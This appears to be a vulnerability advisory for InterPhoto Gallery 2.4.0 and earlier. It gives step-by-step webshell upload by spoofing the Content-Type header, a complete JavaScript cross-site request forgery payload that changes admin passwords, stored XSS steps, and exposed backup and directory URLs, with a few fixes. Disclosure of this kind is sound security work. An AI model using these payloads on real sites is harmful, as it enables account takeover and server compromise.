152 lines
No EOL
6 KiB
Text
152 lines
No EOL
6 KiB
Text
'''
|
|
__ __ ____ _ _ ____
|
|
| \/ |/ __ \ /\ | | | | _ \
|
|
| \ / | | | | / \ | | | | |_) |
|
|
| |\/| | | | |/ /\ \| | | | _ < Day 6 (0day)
|
|
| | | | |__| / ____ \ |__| | |_) |
|
|
|_| |_|\____/_/ \_\____/|____/
|
|
|
|
'''
|
|
|
|
- Title : InterPhoto Gallery Multiple Remote Vulnerabilities
|
|
- Affected Version : <= 2.4.0
|
|
- Vendor Site : http://www.weensoft.com
|
|
- Discovery :Abysssec.com
|
|
|
|
- Description :
|
|
===============
|
|
InterPhoto Image Gallery is an open-source, simple-using, advanced, professional multi-users' image website System,and it can primely protect the images of your site. InterPhoto can be used to build all kinds of sites which lay out images mainly, such as: design, fashion, exhibition, photograph, painting sites and so on.
|
|
|
|
- Vulnerabilities:
|
|
==================
|
|
|
|
|
|
1)Upload ( bypass Image Uploader ):
|
|
------------------------------------------------
|
|
InterPhoto allows register users uploading Images.
|
|
InterPhoto's User can upload php webshell with this way:
|
|
|
|
login in the user mode,go to "Publish Image " .
|
|
select file for upload, write other field Required and submit.
|
|
By Tamper Data tools (webscarab, Paros ,...) Trap Request.
|
|
and change "Content-Type" field's value to "image/jpeg".
|
|
|
|
line 143-150 :
|
|
...
|
|
if ($action == 'insertimage')
|
|
{
|
|
$imagefile = $_FILES['imagefile'];
|
|
$valid_image_types = array('image/pjpeg', 'image/jpeg', 'image/jpg');
|
|
$uploaddir = BASEPATH.'MyWebsiteImages/';
|
|
@chmod($uploaddir,0777); // it will chmod upload dir for execute as well !
|
|
...
|
|
as you can see in flow type it's possible to spoof jpeg request .
|
|
|
|
ln 43-56
|
|
...
|
|
if ($image_size[0] > 760 || $image_size[1] > 760) {
|
|
if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/original/'.$imagename)) {
|
|
CreateImageFile($uploaddir.$file_path.'/original/'.$imagename, $uploaddir.$file_path."/760x760/".$imagename,'760');
|
|
CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
|
|
CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
|
|
CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
|
|
}
|
|
}else{
|
|
if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/760x760/'.$imagename)) {
|
|
CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
|
|
CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
|
|
CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
|
|
}
|
|
...
|
|
Refer to size of file you can find your shell in following directory:
|
|
http://site.com/InterPhoto/MyWebsiteImages/
|
|
|
|
|
|
2)Persistent XSRFs:
|
|
-------------------
|
|
Several XSRF existed in this CMS, For Example:Delete user's Image, Change Users&Admin password, Change User&Admin Info,...
|
|
Now see Change Users&Admin password:
|
|
+POC:
|
|
Like number 1 ,go to Publish Image and select Edit HTML,and write this code:
|
|
<script>
|
|
function creat_request(path,parameter,method){
|
|
method = method || "post";
|
|
var remote_dive = document.createElement('div');
|
|
remote_dive.id = 'Div_id';
|
|
var style = 'border:0;width:0;height:0;';
|
|
remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>";
|
|
document.body.appendChild(remote_dive);
|
|
var form = document.createElement("form");
|
|
form.setAttribute("method", method);
|
|
form.setAttribute("action", path);
|
|
form.setAttribute("target", "iframename");
|
|
for(var key in parameter)
|
|
{
|
|
var hiddenField = document.createElement("input");
|
|
hiddenField.setAttribute("type", "hidden");
|
|
hiddenField.setAttribute("name", key);
|
|
hiddenField.setAttribute("value", parameter[key]);
|
|
form.appendChild(hiddenField);
|
|
}
|
|
document.body.appendChild(form);
|
|
form.submit();
|
|
}
|
|
creat_request('http://192.168.101.4/interphoto/mydesk.edit.php',{'action':'updateuser','password':'123456','repassword':'123456','email':'admin@localhost.com','userfullname':'','usercompany':'','useraddress':'','userpostcode':'','usertel':'','userfax':'','useronline':'','userwebsite':''});
|
|
</script>
|
|
|
|
and submit.when any user see this section on Homepage, Delete first image that is Uploaded.
|
|
|
|
|
|
|
|
3)stored XSS :
|
|
--------------
|
|
login in the user mode,go to "Publish Image " .Then
|
|
in "Image Description:" section, select Edit HTML icon,and write java tag script.( also write other field Required )
|
|
and submit.
|
|
for see the XSS go to Home page, and click last update image for see.
|
|
Because InterPhoto used nicedit for Image Description.
|
|
|
|
|
|
|
|
|
|
4)Information Disclosure:
|
|
---------------------------------------------
|
|
5.1)Backup Database is Downloadable:
|
|
+POC:
|
|
http://site.com/InterPhoto/admin/backup/
|
|
+Fix:
|
|
restrict access to this directory by .htaccess file.
|
|
|
|
5.2)Directory listing :
|
|
+POC:
|
|
http://site.com/InterPhoto/admin/backup/
|
|
http://site.com/InterPhoto/MyWebsiteImages
|
|
http://site.com/InterPhoto/UploadImages/
|
|
http://site.com/InterPhoto/library/
|
|
http://site.com/InterPhoto/languages/
|
|
http://site.com/InterPhoto/includes/
|
|
http://site.com/InterPhoto/config/
|
|
http://site.com/InterPhoto/templates/
|
|
http://site.com/InterPhoto/upgrade/
|
|
http://site.com/InterPhoto/admin/includes/
|
|
http://site.com/InterPhoto/admin/templates/ and ....
|
|
+Fix:
|
|
Create index.html in all folders.
|
|
|
|
|
|
5)Path Disclosure:
|
|
--------------------------------------
|
|
InterPhoto CMS has used Smarty library(Templet Engine).
|
|
+Code:for example:class Smarty undefined.
|
|
/library/smarty/libs/Smarty_Compiler.class.php[line 35]
|
|
class Smarty_Compiler extends Smarty {
|
|
...
|
|
+POC:
|
|
http://site.com/InterPhoto/library/smarty/libs/Smarty_Compiler.class.php
|
|
http://site.com/InterPhoto/library/smarty/libs/plugins/modifier.date_format.php
|
|
http://site.com/InterPhoto/library/smarty/templates_c/[ all files. ]
|
|
+Fix:
|
|
Add frist page :
|
|
if(class_exists('Smarty')){
|
|
Add last page:
|
|
} |